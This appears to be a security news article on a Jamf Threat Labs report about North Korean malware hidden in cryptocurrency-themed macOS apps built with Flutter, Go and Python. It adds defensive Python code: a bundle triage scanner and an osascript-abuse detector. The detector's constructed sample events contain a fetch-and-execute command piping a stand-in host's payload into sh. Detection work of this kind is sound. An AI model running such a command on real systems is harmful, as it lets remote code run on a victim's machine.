Jamf Threat Labs has reported a new way North Korean threat actors are targeting Mac users: malware embedded in macOS applications disguised as cryptocurrency-themed games or utilities. The apps are aimed at people interested in cryptocurrency and look harmless, which raises the odds that a target will open them.
How the Malware Operates
The infected apps were built with Flutter, Google's cross-platform UI framework, which lets a single codebase ship to macOS, iOS, and Android. That structure also gives an attacker a convenient place to hide. In a Flutter macOS app the developer's Dart code is not compiled into the main executable; it is compiled ahead of time into a separate dynamic library inside the app bundle, and the main binary is little more than a loader for the Flutter engine. The malicious logic sits in that compiled Dart library, where it is far less obvious to a reviewer or scanner expecting the interesting code to be native code in the main binary.
One of the malware-laden apps, named "New Updates in Crypto Exchange," presents itself as a simple game. Hidden in its code is a function that reaches out to a domain previously linked to North Korean activity. Once the connection is made, the app retrieves additional malicious scripts and runs them, giving the attacker remote control of the infected Mac.
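The following triage script is an added example, not code from Jamf or from the malware; it shows where the Dart code of a Flutter macOS app lives and how to pull hostname-like strings out of that dylib for a quick look. It assumes the standard Flutter layout (FlutterMacOS.framework for the engine and App.framework/App for the compiled Dart code), constructs a fake bundle with a hypothetical host "update.example-c2.invalid" so it runs offline, and treats a short list of well-known Flutter hosts as benign; the real sample's domain is not reproduced here.

```python
import os
import re
import tempfile

# Layout of a Flutter macOS app: the engine lives in FlutterMacOS.framework and
# the developer's Dart code is compiled ahead-of-time into the App.framework
# dylib, so that dylib is where app-specific logic (and any C2 address) ends up.
FLUTTER_RUNTIME = os.path.join("Contents", "Frameworks", "FlutterMacOS.framework")
DART_AOT_DYLIB = os.path.join("Contents", "Frameworks", "App.framework", "App")

# Printable ASCII runs of six or more bytes, the same idea as the `strings` tool.
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{6,}")
# Dotted hostname-like tokens; the last label must be alphabetic.
HOSTNAME = re.compile(r"\b(?:[a-z0-9-]{1,63}\.)+[a-z]{2,}\b", re.IGNORECASE)
# Dotted tokens that look like hosts but are really file or package names.
NOT_A_TLD = {"dart", "dylib", "framework", "swift", "plist", "json", "png",
             "ttf", "app", "bundle", "so"}
# Hosts a legitimate Flutter build commonly references; everything else is reported.
BENIGN_HOSTS = {"flutter.dev", "dart.dev", "pub.dev", "github.com", "apple.com"}


def is_flutter_bundle(bundle):
    return os.path.isdir(os.path.join(bundle, FLUTTER_RUNTIME))


def hostnames_in_binary(path):
    """Return the set of hostname-like strings embedded in a binary file."""
    with open(path, "rb") as f:
        data = f.read()
    hosts = set()
    for run in PRINTABLE_RUN.findall(data):
        for host in HOSTNAME.findall(run.decode("ascii")):
            host = host.lower()
            if host.rsplit(".", 1)[-1] not in NOT_A_TLD:
                hosts.add(host)
    return hosts


def is_benign(host):
    return any(host == b or host.endswith("." + b) for b in BENIGN_HOSTS)


def scan_bundle(bundle):
    """Triage one .app: is it Flutter, and which hosts does its Dart dylib name?"""
    result = {"bundle": bundle, "flutter": is_flutter_bundle(bundle),
              "hosts": set(), "suspicious_hosts": set()}
    dylib = os.path.join(bundle, DART_AOT_DYLIB)
    if result["flutter"] and os.path.isfile(dylib):
        result["hosts"] = hostnames_in_binary(dylib)
        result["suspicious_hosts"] = {h for h in result["hosts"] if not is_benign(h)}
    return result


def scan_tree(root):
    """Scan every .app bundle below root (for example ~/Downloads)."""
    results = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in list(dirnames):
            if d.endswith(".app"):
                results.append(scan_bundle(os.path.join(dirpath, d)))
                dirnames.remove(d)  # do not descend into the bundle itself
    return results


def build_sample_bundle(root):
    """Constructed fixture, not a real sample: a fake Flutter app whose Dart
    dylib embeds a hypothetical C2 host next to ordinary Flutter strings."""
    bundle = os.path.join(root, "New Updates in Crypto Exchange.app")
    os.makedirs(os.path.join(bundle, FLUTTER_RUNTIME))
    os.makedirs(os.path.dirname(os.path.join(bundle, DART_AOT_DYLIB)))
    fake_dylib = (b"\xcf\xfa\xed\xfe" + b"\x00" * 12              # Mach-O 64-bit magic, padded
                  + b"package:flutter/material.dart\x00"
                  + b"https://pub.dev/packages/http\x00"
                  + b"dart:io\x00"
                  + b"https://update.example-c2.invalid/new\x00"  # hypothetical C2 host
                  + b"/usr/bin/osascript\x00")
    with open(os.path.join(bundle, DART_AOT_DYLIB), "wb") as f:
        f.write(fake_dylib)
    return bundle


def demo():
    """Build the fixture in a scratch directory, scan it, and return the result."""
    root = tempfile.mkdtemp(prefix="flutter-triage-")
    build_sample_bundle(root)
    return scan_tree(root)[0]


if __name__ == "__main__":
    r = demo()
    print(f"{r['bundle']}: flutter={r['flutter']} "
          f"suspicious={sorted(r['suspicious_hosts'])}")
```

On a real machine, point scan_tree at ~/Downloads or /Applications instead of the fixture. The string scan is deliberately crude: it will not see hosts that are obfuscated or assembled at runtime, so an empty result is not a clean bill of health, but a "game" whose Dart dylib names an unfamiliar update host is exactly the kind of thing worth a closer look.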
Variants of the Malware
Jamf Threat Labs identified three versions of the malware, each written with a different toolchain: Flutter (Dart), Go, and Python. Despite the different implementations, all three communicate with external servers controlled by the attackers. The Python-based version, for example, looks like a basic notepad app but connects to a suspicious domain from which the attackers can push AppleScript to be executed on the victim's machine.
The malware abuses AppleScript rather than exploiting a vulnerability in it. AppleScript is macOS's built-in automation language: it can drive other applications and, through its "do shell script" command, run arbitrary shell commands. A script fetched from the attacker's server can therefore collect data, fetch and install further malware, and carry out other actions with the privileges of the user who launched the app.
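A detection for the behaviour described in this section, as an added example that is not part of Jamf's report or any vendor rule: a GUI app bundle spawning osascript with an inline script, the script escaping to the shell, and the same app also spawning a downloader. The process events are constructed for the example and loosely modelled on what an EDR or Endpoint Security exporter would emit, the host "update.example-c2.invalid" is hypothetical, and the indicator list and the two-indicator threshold are choices made here, not anything the page states.

```python
import json
import re

# Parent executable inside a .app bundle: capture the bundle path.
APP_BUNDLE = re.compile(r"^(?P<bundle>.*?\.app)/Contents/MacOS/")
TRUSTED_ROOTS = ("/Applications/", "/System/")
DOWNLOADERS = {"/usr/bin/curl", "/usr/bin/nscurl"}

# Constructed sample events (not real telemetry). One JSON object per line:
# a browser, a fake crypto "game" launched from ~/Downloads that spawns curl and
# osascript, and a legitimate Script Editor run for contrast.
SAMPLE_EVENTS = r"""
{"ts": "2024-11-12T10:01:02Z", "pid": 501, "ppid": 1, "exe": "/Applications/Safari.app/Contents/MacOS/Safari", "args": ["Safari"]}
{"ts": "2024-11-12T10:05:40Z", "pid": 612, "ppid": 1, "exe": "/Users/alice/Downloads/New Updates in Crypto Exchange.app/Contents/MacOS/New Updates in Crypto Exchange", "args": ["New Updates in Crypto Exchange"]}
{"ts": "2024-11-12T10:05:41Z", "pid": 613, "ppid": 612, "exe": "/usr/bin/curl", "args": ["curl", "-s", "https://update.example-c2.invalid/new"]}
{"ts": "2024-11-12T10:05:42Z", "pid": 614, "ppid": 612, "exe": "/usr/bin/osascript", "args": ["osascript", "-e", "do shell script \"curl -s https://update.example-c2.invalid/stage2 | sh\""]}
{"ts": "2024-11-12T10:20:00Z", "pid": 700, "ppid": 1, "exe": "/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor", "args": ["Script Editor"]}
{"ts": "2024-11-12T10:20:05Z", "pid": 701, "ppid": 700, "exe": "/usr/bin/osascript", "args": ["osascript", "/Users/alice/Scripts/rename.scpt"]}
"""


def parse_events(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def detect_osascript_abuse(events, min_indicators=2):
    """Flag osascript launches driven by an app bundle when enough indicators line up.

    A single indicator (say, an app in ~/Downloads running a script) is routine;
    requiring min_indicators keeps Script Editor and similar tools quiet.
    """
    by_pid = {e["pid"]: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)

    alerts = []
    for e in events:
        if e["exe"] != "/usr/bin/osascript":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        m = APP_BUNDLE.match(parent["exe"])
        if not m:
            continue  # only GUI app bundles driving osascript are of interest here
        bundle = m.group("bundle")

        reasons = []
        if not bundle.startswith(TRUSTED_ROOTS):
            reasons.append("app bundle outside /Applications or /System")
        args = e["args"]
        if "-e" in args:
            reasons.append("inline script passed with -e rather than a script file")
        if "do shell script" in " ".join(args[1:]):
            reasons.append("AppleScript escapes to the shell")
        if any(c["exe"] in DOWNLOADERS for c in children.get(parent["pid"], [])):
            reasons.append("same app also spawned a downloader")

        if len(reasons) >= min_indicators:
            alerts.append({"ts": e["ts"], "pid": e["pid"], "bundle": bundle,
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect_osascript_abuse(parse_events(SAMPLE_EVENTS)):
        print(f"{a['ts']} pid={a['pid']} {a['bundle']}")
        for r in a["reasons"]:
            print("  -", r)
```

Only the fake game's osascript launch (pid 614) trips the rule; the Script Editor run has none of the four indicators. In production the script text would usually come from the osascript command line or from Endpoint Security exec events, and the downloader set would be extended to whatever the Go and Python variants use to fetch their payloads.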
Staying Safe from This Threat
Though there is no evidence that these apps have spread widely, Mac users should remain cautious. Downloading apps only from the Mac App Store reduces the risk, since Apple reviews submissions, and it is wise to be suspicious of apps sent through direct messages or download links, particularly crypto-themed ones, even when they open without a Gatekeeper warning: a developer signature identifies who signed the app, it does not vouch for what the app does. Keeping macOS and installed apps updated is also crucial, as updates frequently include patches against newly discovered security risks.